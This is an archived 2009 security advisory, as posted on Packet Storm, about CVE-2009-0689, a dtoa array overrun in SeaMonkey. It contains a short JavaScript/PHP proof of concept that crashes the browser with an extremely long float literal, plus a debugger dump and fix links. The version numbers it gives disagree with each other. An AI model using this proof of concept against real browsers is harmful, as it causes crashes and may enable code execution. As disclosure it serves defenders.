what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

SeaMonkey 1.1.0 Remote Array Overrun

SeaMonkey 1.1.0 Remote Array Overrun
Posted Nov 20, 2009
Authored by Maksymilian Arciemowicz | Site securityreason.com

SeaMonkey version 1.1.8 suffers from a remote array overrun vulnerability that allows for arbitrary code execution.

tags | exploit, remote, overflow, arbitrary, code execution
advisories | CVE-2009-0689
SHA-256 | 2aa2eab42892d1c8cf5768b431d3c784578d3ee3b77c8e0e16d5a0e45da5403f

SeaMonkey 1.1.0 Remote Array Overrun

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ SeaMonkey 1.1.8 Remote Array Overrun (Arbitrary code execution) ]

Author: Maksymilian Arciemowicz and sp3x
https://SecurityReason.com
Date:
- - Dis.: 07.05.2009
- - Pub.: 20.11.2009

CVE: CVE-2009-0689
Risk: High
Remote: Yes

Affected Software:
- - SeaMonkey 1.1.18

Fixed in:
- - SeaMonkey 2.0

NOTE: Prior versions may also be affected.

Original URL:
https://securityreason.com/achievement_securityalert/71


- --- 0.Description ---
The SeaMonkey project is a community effort to develop the SeaMonkey
all-in-one internet application suite (see below). Such a software suite
was previously made popular by Netscape and Mozilla, and the SeaMonkey
project continues to develop and deliver high-quality updates to this
concept. Containing an Internet browser, email & newsgroup client with
an included web feed reader, HTML editor, IRC chat and web development
tools, SeaMonkey is sure to appeal to advanced users, web developers and
corporate users.


- --- 1. SeaMonkey 1.1.18 Remote Array Overrun (Arbitrary code
execution) ---
The main problem exist in dtoa implementation. SeaMonkey has the same
dtoa as a KDE, Opera and all BSD systems. This issue has been fixed in
Firefox 3.5.4 and fix

https://bonsai.mozilla.org/cvsview2.cgi?diff_mode=context&whitespace_mode=show&file=jsdtoa.c&branch=&root=/cvsroot&subdir=mozilla/js/src&command=DIFF_FRAMESET&rev1=3.41&rev2=3.42

has been used to patch SeaMonkey 2.0.

This flaw has been detected in may 2009 and signed SREASONRES:20090625.

https://securityreason.com/achievement_securityalert/63

but fix for SREASONRES:20090625, used by openbsd was not good.
More information about fix for openbsd and similars SREASONRES:20091030,

https://securityreason.com/achievement_securityalert/69

We can create any number of float, which will overwrite the memory. In
Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it
is possible to call 16<= elements of freelist array.


- --- 2. Proof of Concept (PoC) ---

- -----------------------
<script>
var a=0.<?php echo str_repeat("9",299999); ?>;
</script>
- -----------------------

If we use SeaMonkey to see this PoC, SeaMonkey will crash. For example

- -----------------------
<script>
var a=0.<?php echo str_repeat("1",296450); ?>;
</script>
- -----------------------

127# gdb seamonkey-bin seamonkey-bin.core
...
#0 0x28df0ecb in ?? ()
...
(gdb) i r
eax 0x0 0
ecx 0x2 2
edx 0xbfbfd2fc -1077947652
ebx 0x28da9b6c 685415276
esp 0xbfbfd2ac 0xbfbfd2ac
ebp 0xbfbfd2c8 0xbfbfd2c8
esi 0xb 11
edi 0xb 11
eip 0x28df0ecb 0x28df0ecb
...

esi = esi = 11


- --- 3. SecurityReason Note ---

Officialy SREASONRES:20090625 has been detected in:
- - OpenBSD
- - NetBSD
- - FreeBSD
- - MacOSX
- - Google Chrome
- - Mozilla Firefox
- - Mozilla Seamonkey
- - KDE (example: konqueror)
- - Opera
- - K-Meleon

This list is not yet closed. US-CERT declared that will inform all
vendors about this issue, however, they did not do it. Even greater
confusion caused new CVE number "CVE-2009-1563". Secunia has informed
that this vulnerability was only detected in Mozilla Firefox, but nobody
was aware that the problem affects other products like ( KDE, Chrome )
and it is based on "CVE-2009-0689". After some time Mozilla Foundation
Security Advisory
("https://www.mozilla.org/security/announce/2009/mfsa2009-59.html")
was updated with note :
"The underlying flaw in the dtoa routines used by Mozilla appears to be
essentially the same as that reported against the libc gdtoa routine by
Maksymilian Arciemowicz ( CVE-2009-0689)".
This fact ( new CVE number for Firefox Vulnerability )and PoC in
javascript (from Secunia), forced us to official notification all other
vendors. We publish all the individual advisories, to formally show all
vulnerable software and to avoid wrong CVE number. We do not see any
other way to fix this issue in all products.

Please note:
Patch used in Firefox 3.5.4 does not fully solve the problem. Dtoa
algorithm is not optimal and allows remote Denial of Service in Firefox
3.5.5 giving long float number.


- --- 4. Fix ---
NetBSD fix (optimal):
https://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h

OpenBSD fix:
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c
https://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c


- --- 5. Credits ---
Discovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.


- --- 6. Greets ---
Infospec p_e_a pi3


- --- 7. Contact ---
Email:
- - cxib {a.t] securityreason [d0t} com
- - sp3x {a.t] securityreason [d0t} com

GPG:
- - https://securityreason.com/key/Arciemowicz.Maksymilian.gpg
- - https://securityreason.com/key/sp3x.gpg

https://securityreason.com/
https://securityreason.pl/
-----BEGIN PGP SIGNATURE-----

iEYEARECAAYFAksF2IQACgkQpiCeOKaYa9Z2vgCgvqQwFzfwqYsBNbL2To29/o6D
ZBgAn0bwlhNtD89nVWtxI2Qf0UA7/ZqB
=JY6k
-----END PGP SIGNATURE-----

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close